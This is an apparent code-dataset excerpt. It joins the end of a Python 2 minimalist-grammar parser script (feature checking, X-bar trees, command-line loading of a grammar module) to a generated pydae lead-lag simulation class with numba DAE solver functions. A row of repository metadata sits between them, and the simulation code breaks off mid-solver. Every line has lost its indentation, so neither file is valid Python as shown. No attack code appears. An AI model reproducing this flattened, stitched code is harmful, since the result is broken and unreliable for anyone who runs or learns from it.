# remember:
# fs[0] = head features, fs[0][0] = 1st feature of head, fs[0][0][0] = type of 1st feature
def merge_checkXB(fs0,fs1,xb1,m,cat,cntr):
if fs0[0][0][0] == 'sel' and fs1[0][0][0] == 'cat' and fs0[0][0][1] == fs1[0][0][1]:
newfs = [fs0[0][1:][:]] # copy remaining head1 features
newfs.extend(fs0[1:][:]) # add movers1
newfs.extend(fs1[1:][:]) # add movers2
if fs1[0][1:] <> []: # any remaining features from head2? If so, new mover
scat = cat+'P('+str(cntr)+')'
cntr0 = cntr + 1
xb1m = ([scat],[]) # trace
newfs.append(fs1[0][1:])
xb1[0] = scat
m.append((fs1[0][1:],xb1))
else:
cntr0 = cntr
xb1m = xb1
return (newfs,xb1m,cntr0)
else:
raise RuntimeError('merge_check error')
def getMoverXB(f,moverFeatureLists,treeList):
mover = []
remainder = []
remainderTrees = []
for fs in moverFeatureLists:
if fs[0][1] == f:
if mover == []: # OK if we did not already find an f
mover = [fs[1:]] # put remainder into singleton list
else: # if we find 2 f's, there is an SMC violation
raise RuntimeError('SMC violation in move_check')
else:
remainder.extend(fs)
for (fs,t) in treeList:
if fs[0][1] == f: # return copy of moving tree
moverTree = t[:]
else: # add copy of any other trees
remainderTrees.append((fs,t[:]))
return (mover,moverTree,remainder,remainderTrees)
def move_checkXB(fs0,m):
newfs = [fs0[0][1:]] # remaining head1 features
(mover,moverTree,remainder,remainderTrees) = getMoverXB(fs0[0][0][1],fs0[1:],m)
if remainder<>[]: # put other mover features back into list, if any
newfs.append(remainder)
if mover[0]<>[]: # if this mover is moving again, put it into list too
newfs.append(mover[0]) # extend movers1 with movers2
mt = ('',[]) # trace
remainderTrees.append((mover[0],moverTree))
else:
mt = moverTree
return (newfs,mt,remainderTrees)
def catOf(fs):
for (ftype,f) in fs:
if ftype == 'cat':
return f[:]
def dt2sxb(dt,cntr): # compute (state,xb,moving) triple
if isinstance(dt,tuple):
cat = catOf(dt[1])
return ([dt[1]],[cat,dt[0]],[],cat,True,cntr)
elif dt[0]=='*': # all other states result from feature checking
(fs0,xb0,m0,cat0,lexical0,cntr0) = dt2sxb(dt[1],cntr)
(fs1,xb1,m1,cat1,lexical1,cntr1) = dt2sxb(dt[2],cntr0)
m = m0
m.extend(m1)
(fs,xb1m,cntr2) = merge_checkXB(fs0,fs1,xb1,m,cat1,cntr1) # may add additional mover to m
hcat = cat0+"'"
scat = cat1+'P'
if isinstance(xb1m,list): # a trace is a pair
xb1m[0] = scat
if lexical0:
xb = [hcat,xb0,xb1m]
else:
xb = [hcat,xb1m,xb0]
return (fs,xb,m,cat0,False,cntr2)
elif dt[0]=='o':
(fs0,xb0,m0,cat0,lexical0,cntr0) = dt2sxb(dt[1],cntr)
(fs,mt,m) = move_checkXB(fs0,m0)
hcat = cat0+"'"
xb = [cat0,mt,xb0]
return (fs,xb,m,cat0,False,cntr0)
"""
http://docs.python.org/library/functions.html#__import__
'Direct use of __import__() is rare, except in cases where you want to
import a module whose name is only known at runtime.'
"""
if len(sys.argv)<>4:
print '\nFound',len(sys.argv)-1,'parameters but',
print '3 parameters are required:'
print ' mgtdbp.py grammar startCategory minimumProbability\n'
print 'For example:'
print ' python mgtdbp.py mg0 C 0.0001'
print 'or:'
print ' python mgtdbp.py mgxx T 0.0000001\n'
print 'For line editing, you could use:'
print ' rlwrap python mgtdbp.py mg0 C 0.0001'
print 'or, if you have ipython:'
print ' ipython mgtdbp.py mg0 C 0.0001\n'
sys.exit()
# from the grammar specified in sys.argv[1], import *
grammar=__import__(sys.argv[1], globals(), locals(), ['*'])
# with mgxx, p=0.000000001 is small enough for: a b b b b a b b b b
# with mg0, p=0.0001 is small enough for:
# which king says which queen knows which king says which wine the queen prefers
go1(grammar.g,sys.argv[2],-1 * float(sys.argv[3]))
| 32.194444 | 97 | 0.565784 |
fb355ec4af64545004ee2e9654f74bb767e387f9 | 33,874 | py | Python | examples/ctrl/basic/lead_lag.py | pydae/pydae | 8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d | [
"MIT"
] | 1 | 2020-12-20T03:45:26.000Z | 2020-12-20T03:45:26.000Z | examples/ctrl/basic/lead_lag.py | pydae/pydae | 8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d | [
"MIT"
] | null | null | null | examples/ctrl/basic/lead_lag.py | pydae/pydae | 8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d | [
"MIT"
] | null | null | null | import numpy as np
import numba
import scipy.optimize as sopt
import json
sin = np.sin
cos = np.cos
atan2 = np.arctan2
sqrt = np.sqrt
sign = np.sign
class lead_lag_class:
def __init__(self):
self.t_end = 10.000000
self.Dt = 0.0010000
self.decimation = 10.000000
self.itol = 1e-6
self.Dt_max = 0.001000
self.Dt_min = 0.001000
self.solvern = 5
self.imax = 100
self.N_x = 1
self.N_y = 1
self.N_z = 1
self.N_store = 10000
self.params_list = ['T_1', 'T_2']
self.params_values_list = [2, 0.1]
self.inputs_ini_list = ['u_l']
self.inputs_ini_values_list = [0.0]
self.inputs_run_list = ['u_l']
self.inputs_run_values_list = [0.0]
self.outputs_list = ['u_l']
self.x_list = ['x_l']
self.y_run_list = ['z_l']
self.xy_list = self.x_list + self.y_run_list
self.y_ini_list = ['z_l']
self.xy_ini_list = self.x_list + self.y_ini_list
self.t = 0.0
self.it = 0
self.it_store = 0
self.xy_prev = np.zeros((self.N_x+self.N_y,1))
self.initialization_tol = 1e-6
self.N_u = len(self.inputs_run_list)
self.sopt_root_method='hybr'
self.sopt_root_jac=True
self.u_ini_list = self.inputs_ini_list
self.u_ini_values_list = self.inputs_ini_values_list
self.u_run_list = self.inputs_run_list
self.u_run_values_list = self.inputs_run_values_list
self.N_u = len(self.u_run_list)
Fx_ini_rows,Fx_ini_cols,Fy_ini_rows,Fy_ini_cols,Gx_ini_rows,Gx_ini_cols,Gy_ini_rows,Gy_ini_cols = nonzeros()
self.Fx_ini_rows = np.array(Fx_ini_rows)
if len(Fx_ini_rows) == 1:
self.Fx_ini_rows = np.array([[Fx_ini_rows]]).reshape(1,)
self.Fx_ini_cols = np.array([[Fx_ini_cols]]).reshape(1,)
self.Fx_ini_cols = np.array(Fx_ini_cols)
self.Fy_ini_rows = np.array(Fy_ini_rows)
self.Fy_ini_cols = np.array(Fy_ini_cols)
self.Gx_ini_rows = np.array(Gx_ini_rows)
self.Gx_ini_cols = np.array(Gx_ini_cols)
self.Gy_ini_rows = np.array(Gy_ini_rows)
self.Gy_ini_cols = np.array(Gy_ini_cols)
self.yini2urun = list(set(self.inputs_run_list).intersection(set(self.y_ini_list)))
self.uini2yrun = list(set(self.y_run_list).intersection(set(self.inputs_ini_list)))
self.update()
def update(self):
self.N_steps = int(np.ceil(self.t_end/self.Dt))
dt = [
('t_end', np.float64),
('Dt', np.float64),
('decimation', np.float64),
('itol', np.float64),
('Dt_max', np.float64),
('Dt_min', np.float64),
('solvern', np.int64),
('imax', np.int64),
('N_steps', np.int64),
('N_store', np.int64),
('N_x', np.int64),
('N_y', np.int64),
('N_z', np.int64),
('t', np.float64),
('it', np.int64),
('it_store', np.int64),
('idx', np.int64),
('idy', np.int64),
('f', np.float64, (self.N_x,1)),
('x', np.float64, (self.N_x,1)),
('x_0', np.float64, (self.N_x,1)),
('g', np.float64, (self.N_y,1)),
('y_run', np.float64, (self.N_y,1)),
('y_ini', np.float64, (self.N_y,1)),
('u_run', np.float64, (self.N_u,1)),
('y_0', np.float64, (self.N_y,1)),
('h', np.float64, (self.N_z,1)),
('Fx', np.float64, (self.N_x,self.N_x)),
('Fy', np.float64, (self.N_x,self.N_y)),
('Gx', np.float64, (self.N_y,self.N_x)),
('Gy', np.float64, (self.N_y,self.N_y)),
('Fu', np.float64, (self.N_x,self.N_u)),
('Gu', np.float64, (self.N_y,self.N_u)),
('Hx', np.float64, (self.N_z,self.N_x)),
('Hy', np.float64, (self.N_z,self.N_y)),
('Hu', np.float64, (self.N_z,self.N_u)),
('Fx_ini', np.float64, (self.N_x,self.N_x)),
('Fy_ini', np.float64, (self.N_x,self.N_y)),
('Gx_ini', np.float64, (self.N_y,self.N_x)),
('Gy_ini', np.float64, (self.N_y,self.N_y)),
('T', np.float64, (self.N_store+1,1)),
('X', np.float64, (self.N_store+1,self.N_x)),
('Y', np.float64, (self.N_store+1,self.N_y)),
('Z', np.float64, (self.N_store+1,self.N_z)),
('iters', np.float64, (self.N_store+1,1)),
('store', np.int64),
('Fx_ini_rows', np.int64, self.Fx_ini_rows.shape),
('Fx_ini_cols', np.int64, self.Fx_ini_cols.shape),
('Fy_ini_rows', np.int64, self.Fy_ini_rows.shape),
('Fy_ini_cols', np.int64, self.Fy_ini_cols.shape),
('Gx_ini_rows', np.int64, self.Gx_ini_rows.shape),
('Gx_ini_cols', np.int64, self.Gx_ini_cols.shape),
('Gy_ini_rows', np.int64, self.Gy_ini_rows.shape),
('Gy_ini_cols', np.int64, self.Gy_ini_cols.shape),
('Ac_ini', np.float64, ((self.N_x+self.N_y,self.N_x+self.N_y))),
('fg', np.float64, ((self.N_x+self.N_y,1))),
]
values = [
self.t_end,
self.Dt,
self.decimation,
self.itol,
self.Dt_max,
self.Dt_min,
self.solvern,
self.imax,
self.N_steps,
self.N_store,
self.N_x,
self.N_y,
self.N_z,
self.t,
self.it,
self.it_store,
0, # idx
0, # idy
np.zeros((self.N_x,1)), # f
np.zeros((self.N_x,1)), # x
np.zeros((self.N_x,1)), # x_0
np.zeros((self.N_y,1)), # g
np.zeros((self.N_y,1)), # y_run
np.zeros((self.N_y,1)), # y_ini
np.zeros((self.N_u,1)), # u_run
np.zeros((self.N_y,1)), # y_0
np.zeros((self.N_z,1)), # h
np.zeros((self.N_x,self.N_x)), # Fx
np.zeros((self.N_x,self.N_y)), # Fy
np.zeros((self.N_y,self.N_x)), # Gx
np.zeros((self.N_y,self.N_y)), # Fy
np.zeros((self.N_x,self.N_u)), # Fu
np.zeros((self.N_y,self.N_u)), # Gu
np.zeros((self.N_z,self.N_x)), # Hx
np.zeros((self.N_z,self.N_y)), # Hy
np.zeros((self.N_z,self.N_u)), # Hu
np.zeros((self.N_x,self.N_x)), # Fx_ini
np.zeros((self.N_x,self.N_y)), # Fy_ini
np.zeros((self.N_y,self.N_x)), # Gx_ini
np.zeros((self.N_y,self.N_y)), # Fy_ini
np.zeros((self.N_store+1,1)), # T
np.zeros((self.N_store+1,self.N_x)), # X
np.zeros((self.N_store+1,self.N_y)), # Y
np.zeros((self.N_store+1,self.N_z)), # Z
np.zeros((self.N_store+1,1)), # iters
1,
self.Fx_ini_rows,
self.Fx_ini_cols,
self.Fy_ini_rows,
self.Fy_ini_cols,
self.Gx_ini_rows,
self.Gx_ini_cols,
self.Gy_ini_rows,
self.Gy_ini_cols,
np.zeros((self.N_x+self.N_y,self.N_x+self.N_y)),
np.zeros((self.N_x+self.N_y,1)),
]
dt += [(item,np.float64) for item in self.params_list]
values += [item for item in self.params_values_list]
for item_id,item_val in zip(self.inputs_ini_list,self.inputs_ini_values_list):
if item_id in self.inputs_run_list: continue
dt += [(item_id,np.float64)]
values += [item_val]
dt += [(item,np.float64) for item in self.inputs_run_list]
values += [item for item in self.inputs_run_values_list]
self.struct = np.rec.array([tuple(values)], dtype=np.dtype(dt))
xy0 = np.zeros((self.N_x+self.N_y,))
self.ini_dae_jacobian_nn(xy0)
self.run_dae_jacobian_nn(xy0)
def load_params(self,data_input):
if type(data_input) == str:
json_file = data_input
self.json_file = json_file
self.json_data = open(json_file).read().replace("'",'"')
data = json.loads(self.json_data)
elif type(data_input) == dict:
data = data_input
self.data = data
for item in self.data:
self.struct[0][item] = self.data[item]
self.params_values_list[self.params_list.index(item)] = self.data[item]
def ini_problem(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
ini(self.struct,2)
ini(self.struct,3)
else:
ini.py_func(self.struct,2)
ini.py_func(self.struct,3)
fg = np.vstack((self.struct[0].f,self.struct[0].g))[:,0]
return fg
def run_problem(self,x):
t = self.struct[0].t
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
run(t,self.struct,2)
run(t,self.struct,3)
run(t,self.struct,10)
run(t,self.struct,11)
run(t,self.struct,12)
run(t,self.struct,13)
else:
run.py_func(t,self.struct,2)
run.py_func(t,self.struct,3)
run.py_func(t,self.struct,10)
run.py_func(t,self.struct,11)
run.py_func(t,self.struct,12)
run.py_func(t,self.struct,13)
fg = np.vstack((self.struct[0].f,self.struct[0].g))[:,0]
return fg
def run_dae_jacobian(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
run(0.0,self.struct,13)
A_c = np.block([[self.struct[0].Fx,self.struct[0].Fy],
[self.struct[0].Gx,self.struct[0].Gy]])
return A_c
def run_dae_jacobian_nn(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
run_nn(0.0,self.struct,10)
run_nn(0.0,self.struct,11)
run_nn(0.0,self.struct,12)
run_nn(0.0,self.struct,13)
def eval_jacobians(self):
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
return 1
def ini_dae_jacobian(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
ini(self.struct,10)
ini(self.struct,11)
else:
ini.py_func(self.struct,10)
ini.py_func(self.struct,11)
A_c = np.block([[self.struct[0].Fx_ini,self.struct[0].Fy_ini],
[self.struct[0].Gx_ini,self.struct[0].Gy_ini]])
return A_c
def ini_dae_jacobian_nn(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
ini_nn(self.struct,10)
ini_nn(self.struct,11)
def f_ode(self,x):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def f_odeint(self,x,t):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def f_ivp(self,t,x):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def Fx_ode(self,x):
self.struct[0].x[:,0] = x
run(self.struct,10)
return self.struct[0].Fx
def eval_A(self):
Fx = self.struct[0].Fx
Fy = self.struct[0].Fy
Gx = self.struct[0].Gx
Gy = self.struct[0].Gy
A = Fx - Fy @ np.linalg.solve(Gy,Gx)
self.A = A
return A
def eval_A_ini(self):
Fx = self.struct[0].Fx_ini
Fy = self.struct[0].Fy_ini
Gx = self.struct[0].Gx_ini
Gy = self.struct[0].Gy_ini
A = Fx - Fy @ np.linalg.solve(Gy,Gx)
return A
def reset(self):
for param,param_value in zip(self.params_list,self.params_values_list):
self.struct[0][param] = param_value
for input_name,input_value in zip(self.inputs_ini_list,self.inputs_ini_values_list):
self.struct[0][input_name] = input_value
for input_name,input_value in zip(self.inputs_run_list,self.inputs_run_values_list):
self.struct[0][input_name] = input_value
def simulate(self,events,xy0=0):
# initialize both the ini and the run system
self.initialize(events,xy0=xy0)
# simulation run
for event in events:
# make all the desired changes
self.run([event])
# post process
T,X,Y,Z = self.post()
return T,X,Y,Z
def run(self,events):
# simulation run
for event in events:
# make all the desired changes
for item in event:
self.struct[0][item] = event[item]
daesolver(self.struct) # run until next event
return 1
def rtrun(self,events):
# simulation run
for event in events:
# make all the desired changes
for item in event:
self.struct[0][item] = event[item]
self.struct[0].it_store = self.struct[0].N_store-1
daesolver(self.struct) # run until next event
return 1
def post(self):
# post process result
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
self.T = T
self.X = X
self.Y = Y
self.Z = Z
self.iters = iters
return T,X,Y,Z
def save_0(self,file_name = 'xy_0.json'):
xy_0_dict = {}
for item in self.x_list:
xy_0_dict.update({item:self.get_value(item)})
for item in self.y_ini_list:
xy_0_dict.update({item:self.get_value(item)})
xy_0_str = json.dumps(xy_0_dict, indent=4)
with open(file_name,'w') as fobj:
fobj.write(xy_0_str)
def load_0(self,file_name = 'xy_0.json'):
with open(file_name) as fobj:
xy_0_str = fobj.read()
xy_0_dict = json.loads(xy_0_str)
for item in xy_0_dict:
if item in self.x_list:
self.xy_prev[self.x_list.index(item)] = xy_0_dict[item]
if item in self.y_ini_list:
self.xy_prev[self.y_ini_list.index(item)+self.N_x] = xy_0_dict[item]
def initialize(self,events=[{}],xy0=0,compile=True):
'''
Parameters
----------
events : dictionary
Dictionary with at least 't_end' and all inputs and parameters
that need to be changed.
xy0 : float or string, optional
0 means all states should be zero as initial guess.
If not zero all the states initial guess are the given input.
If 'prev' it uses the last known initialization result as initial guess.
Returns
-------
initialization_ok : bool
    True if the initialization problem converged, False otherwise.
'''
self.compile = compile
# simulation parameters
self.struct[0].it = 0 # set time step to zero
self.struct[0].it_store = 0 # set storage to zero
self.struct[0].t = 0.0 # set time to zero
# initialization
it_event = 0
event = events[it_event]
for item in event:
self.struct[0][item] = event[item]
## compute initial conditions using x and y_ini
if type(xy0) == str:
if xy0 == 'prev':
xy0 = self.xy_prev
else:
self.load_0(xy0)
xy0 = self.xy_prev
elif type(xy0) == dict:
with open('xy_0.json','w') as fobj:
fobj.write(json.dumps(xy0))
self.load_0('xy_0.json')
xy0 = self.xy_prev
else:
if xy0 == 0:
xy0 = np.zeros(self.N_x+self.N_y)
elif xy0 == 1:
xy0 = np.ones(self.N_x+self.N_y)
else:
xy0 = xy0*np.ones(self.N_x+self.N_y)
#xy = sopt.fsolve(self.ini_problem,xy0, jac=self.ini_dae_jacobian )
if self.sopt_root_jac:
sol = sopt.root(self.ini_problem, xy0,
jac=self.ini_dae_jacobian,
method=self.sopt_root_method, tol=self.initialization_tol)
else:
sol = sopt.root(self.ini_problem, xy0, method=self.sopt_root_method)
self.initialization_ok = True
if sol.success == False:
print('initialization not found!')
self.initialization_ok = False
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
if self.initialization_ok:
xy = sol.x
self.xy_prev = xy
self.struct[0].x[:,0] = xy[0:self.N_x]
self.struct[0].y_run[:,0] = xy[self.N_x:]
## y_ini to u_run
for item in self.inputs_run_list:
if item in self.y_ini_list:
self.struct[0][item] = self.struct[0].y_ini[self.y_ini_list.index(item)]
## u_ini to y_run
for item in self.inputs_ini_list:
if item in self.y_run_list:
self.struct[0].y_run[self.y_run_list.index(item)] = self.struct[0][item]
#xy = sopt.fsolve(self.ini_problem,xy0, jac=self.ini_dae_jacobian )
if self.sopt_root_jac:
sol = sopt.root(self.run_problem, xy0,
jac=self.run_dae_jacobian,
method=self.sopt_root_method, tol=self.initialization_tol)
else:
sol = sopt.root(self.run_problem, xy0, method=self.sopt_root_method)
if self.compile:
# evaluate f and g
run(0.0,self.struct,2)
run(0.0,self.struct,3)
# evaluate run jacobians
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
run(0.0,self.struct,14)
else:
# evaluate f and g
run.py_func(0.0,self.struct,2)
run.py_func(0.0,self.struct,3)
# evaluate run jacobians
run.py_func(0.0,self.struct,10)
run.py_func(0.0,self.struct,11)
run.py_func(0.0,self.struct,12)
run.py_func(0.0,self.struct,14)
# post process result
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
self.T = T
self.X = X
self.Y = Y
self.Z = Z
self.iters = iters
return self.initialization_ok
def get_value(self,name):
if name in self.inputs_run_list:
value = self.struct[0][name]
if name in self.x_list:
idx = self.x_list.index(name)
value = self.struct[0].x[idx,0]
if name in self.y_run_list:
idy = self.y_run_list.index(name)
value = self.struct[0].y_run[idy,0]
if name in self.params_list:
value = self.struct[0][name]
if name in self.outputs_list:
value = self.struct[0].h[self.outputs_list.index(name),0]
return value
def get_values(self,name):
if name in self.x_list:
values = self.X[:,self.x_list.index(name)]
if name in self.y_run_list:
values = self.Y[:,self.y_run_list.index(name)]
if name in self.outputs_list:
values = self.Z[:,self.outputs_list.index(name)]
return values
def get_mvalue(self,names):
'''
Parameters
----------
names : list
List of variable names whose current values are requested.
Returns
-------
mvalue : list
List with the current value of each requested variable.
'''
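# e.g. self.get_mvalue(['x_l', 'z_l']) returns the current values of those two variables,
# in order (illustrative; the available names depend on the generated model).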
mvalue = []
for name in names:
mvalue += [self.get_value(name)]
return mvalue
def set_value(self,name_,value):
if name_ in self.inputs_run_list:
self.struct[0][name_] = value
return
elif name_ in self.params_list:
self.struct[0][name_] = value
return
elif name_ in self.inputs_ini_list:
self.struct[0][name_] = value
return
else:
print(f'Input or parameter {name_} not found.')
def set_values(self,dictionary):
for item in dictionary:
self.set_value(item,dictionary[item])
def report_x(self,value_format='5.2f', decimals=2):
for item in self.x_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_y(self,value_format='5.2f', decimals=2):
for item in self.y_run_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_u(self,value_format='5.2f', decimals=2):
for item in self.inputs_run_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_z(self,value_format='5.2f', decimals=2):
for item in self.outputs_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_params(self,value_format='5.2f', decimals=2):
for item in self.params_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def get_x(self):
return self.struct[0].x
def ss(self):
ssate(self.struct,self.xy_prev.reshape(len(self.xy_prev),1))
## y_ini to y_run
self.struct[0].y_run = self.struct[0].y_ini
## y_ini to u_run
for item in self.yini2urun:
self.struct[0][item] = self.struct[0].y_ini[self.y_ini_list.index(item)]
## u_ini to y_run
for item in self.uini2yrun:
self.struct[0].y_run[self.y_run_list.index(item)] = self.struct[0][item]
@numba.njit(cache=True)
def ini(struct,mode):
# Parameters:
T_1 = struct[0].T_1
T_2 = struct[0].T_2
# Inputs:
u_l = struct[0].u_l
# Dynamical states:
x_l = struct[0].x[0,0]
# Algebraic states:
z_l = struct[0].y_ini[0,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = (u_l - x_l)/T_2
# Algebraic equations:
if mode == 3:
struct[0].g[:,:] = np.ascontiguousarray(struct[0].Gy_ini) @ np.ascontiguousarray(struct[0].y_ini)
struct[0].g[0,0] = T_1*(u_l - x_l)/T_2 + x_l - z_l
# Outputs:
if mode == 3:
struct[0].h[0,0] = u_l
if mode == 10:
struct[0].Fx_ini[0,0] = -1/T_2
if mode == 11:
struct[0].Gx_ini[0,0] = -T_1/T_2 + 1
pass
@numba.njit(cache=True)
def run(t,struct,mode):
# Parameters:
T_1 = struct[0].T_1
T_2 = struct[0].T_2
# Inputs:
u_l = struct[0].u_l
# Dynamical states:
x_l = struct[0].x[0,0]
# Algebraic states:
z_l = struct[0].y_run[0,0]
struct[0].u_run[0,0] = u_l
# Differential equations:
if mode == 2:
struct[0].f[0,0] = (u_l - x_l)/T_2
# Algebraic equations:
if mode == 3:
struct[0].g[:,:] = np.ascontiguousarray(struct[0].Gy) @ np.ascontiguousarray(struct[0].y_run) + np.ascontiguousarray(struct[0].Gu) @ np.ascontiguousarray(struct[0].u_run)
struct[0].g[0,0] = T_1*(u_l - x_l)/T_2 + x_l - z_l
# Outputs:
if mode == 3:
struct[0].h[0,0] = u_l
if mode == 10:
struct[0].Fx[0,0] = -1/T_2
if mode == 11:
struct[0].Gx[0,0] = -T_1/T_2 + 1
if mode > 12:
pass
def ini_nn(struct,mode):
# Parameters:
T_1 = struct[0].T_1
T_2 = struct[0].T_2
# Inputs:
u_l = struct[0].u_l
# Dynamical states:
x_l = struct[0].x[0,0]
# Algebraic states:
z_l = struct[0].y_ini[0,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = (u_l - x_l)/T_2
# Algebraic equations:
if mode == 3:
struct[0].g[0,0] = T_1*(u_l - x_l)/T_2 + x_l - z_l
# Outputs:
if mode == 3:
struct[0].h[0,0] = u_l
if mode == 10:
struct[0].Fx_ini[0,0] = -1/T_2
if mode == 11:
struct[0].Gy_ini[0,0] = -1
def run_nn(t,struct,mode):
# Parameters:
T_1 = struct[0].T_1
T_2 = struct[0].T_2
# Inputs:
u_l = struct[0].u_l
# Dynamical states:
x_l = struct[0].x[0,0]
# Algebraic states:
z_l = struct[0].y_run[0,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = (u_l - x_l)/T_2
# Algebraic equations:
if mode == 3:
struct[0].g[0,0] = T_1*(u_l - x_l)/T_2 + x_l - z_l
# Outputs:
if mode == 3:
struct[0].h[0,0] = u_l
if mode == 10:
struct[0].Fx[0,0] = -1/T_2
if mode == 11:
struct[0].Gy[0,0] = -1
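# Piecewise and ITE below emulate sympy-style conditional expressions in the generated
# equations: the (value, condition) pairs are scanned from the last entry down to the
# first, so the earliest pair whose condition holds ends up providing the result.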
@numba.njit(cache=True)
def Piecewise(arg):
out = arg[0][1]
N = len(arg)
for it in range(N-1,-1,-1):
if arg[it][1]: out = arg[it][0]
return out
@numba.njit(cache=True)
def ITE(arg):
out = arg[0][1]
N = len(arg)
for it in range(N-1,-1,-1):
if arg[it][1]: out = arg[it][0]
return out
@numba.njit(cache=True)
def Abs(x):
return np.abs(x)
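# ini_dae_jacobian_numba assembles the dense initialization jacobian
# Ac_ini = [[Fx_ini, Fy_ini], [Gx_ini, Gy_ini]] from the stored sparsity pattern
# (the *_ini_rows / *_ini_cols index lists), with x stacked on top of y_ini.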
@numba.njit(cache=True)
def ini_dae_jacobian_numba(struct,x):
N_x = struct[0].N_x
N_y = struct[0].N_y
struct[0].x[:,0] = x[0:N_x]
struct[0].y_ini[:,0] = x[N_x:(N_x+N_y)]
ini(struct,10)
ini(struct,11)
for row,col in zip(struct[0].Fx_ini_rows,struct[0].Fx_ini_cols):
struct[0].Ac_ini[row,col] = struct[0].Fx_ini[row,col]
for row,col in zip(struct[0].Fy_ini_rows,struct[0].Fy_ini_cols):
struct[0].Ac_ini[row,col+N_x] = struct[0].Fy_ini[row,col]
for row,col in zip(struct[0].Gx_ini_rows,struct[0].Gx_ini_cols):
struct[0].Ac_ini[row+N_x,col] = struct[0].Gx_ini[row,col]
for row,col in zip(struct[0].Gy_ini_rows,struct[0].Gy_ini_cols):
struct[0].Ac_ini[row+N_x,col+N_x] = struct[0].Gy_ini[row,col]
@numba.njit(cache=True)
def ini_dae_problem(struct,x):
N_x = struct[0].N_x
N_y = struct[0].N_y
struct[0].x[:,0] = x[0:N_x]
struct[0].y_ini[:,0] = x[N_x:(N_x+N_y)]
ini(struct,2)
ini(struct,3)
struct[0].fg[:N_x,:] = struct[0].f[:]
struct[0].fg[N_x:,:] = struct[0].g[:]
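# ssate runs a plain Newton iteration on the stacked residual fg = [f; g]:
# xy <- xy - inv(Ac_ini) @ fg, stopping when max|fg| < 1e-8 or after 100 iterations.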
@numba.njit(cache=True)
def ssate(struct,xy):
for it in range(100):
ini_dae_jacobian_numba(struct,xy[:,0])
ini_dae_problem(struct,xy[:,0])
xy[:] += np.linalg.solve(struct[0].Ac_ini,-struct[0].fg)
if np.max(np.abs(struct[0].fg[:,0]))<1e-8: break
N_x = struct[0].N_x
struct[0].x[:,0] = xy[:N_x,0]
struct[0].y_ini[:,0] = xy[N_x:,0]
return xy,it
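# daesolver integrates the DAE from the current t up to t_end with a fixed step Dt,
# storing decimated samples of T, X, Y and Z in the struct when struct[i].store == 1.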
@numba.njit(cache=True)
def daesolver(struct):
sin = np.sin
cos = np.cos
sqrt = np.sqrt
i = 0
Dt = struct[i].Dt
N_x = struct[i].N_x
N_y = struct[i].N_y
N_z = struct[i].N_z
decimation = struct[i].decimation
eye = np.eye(N_x)
t = struct[i].t
t_end = struct[i].t_end
if struct[i].it == 0:
run(t,struct, 1)
struct[i].it_store = 0
struct[i]['T'][0] = t
struct[i].X[0,:] = struct[i].x[:,0]
struct[i].Y[0,:] = struct[i].y_run[:,0]
struct[i].Z[0,:] = struct[i].h[:,0]
solver = struct[i].solvern
while t<t_end:
struct[i].it += 1
struct[i].t += Dt
t = struct[i].t
if solver == 5: # Trapezoidal DAE as in Milano's book
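# Sketch of the scheme: each step solves for x_{n+1}, y_{n+1} such that
# 0 = x_{n+1} - x_n - 0.5*Dt*( f(x_{n+1},y_{n+1}) + f(x_n,y_n) )
# 0 = g(x_{n+1},y_{n+1})
# using Newton iterations on the stacked residual with the A_c_i jacobian built below.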
run(t,struct, 2)
run(t,struct, 3)
x = np.copy(struct[i].x[:])
y = np.copy(struct[i].y_run[:])
f = np.copy(struct[i].f[:])
g = np.copy(struct[i].g[:])
for iter in range(struct[i].imax):
run(t,struct, 2)
run(t,struct, 3)
run(t,struct,10)
run(t,struct,11)
x_i = struct[i].x[:]
y_i = struct[i].y_run[:]
f_i = struct[i].f[:]
g_i = struct[i].g[:]
F_x_i = struct[i].Fx[:,:]
F_y_i = struct[i].Fy[:,:]
G_x_i = struct[i].Gx[:,:]
G_y_i = struct[i].Gy[:,:]
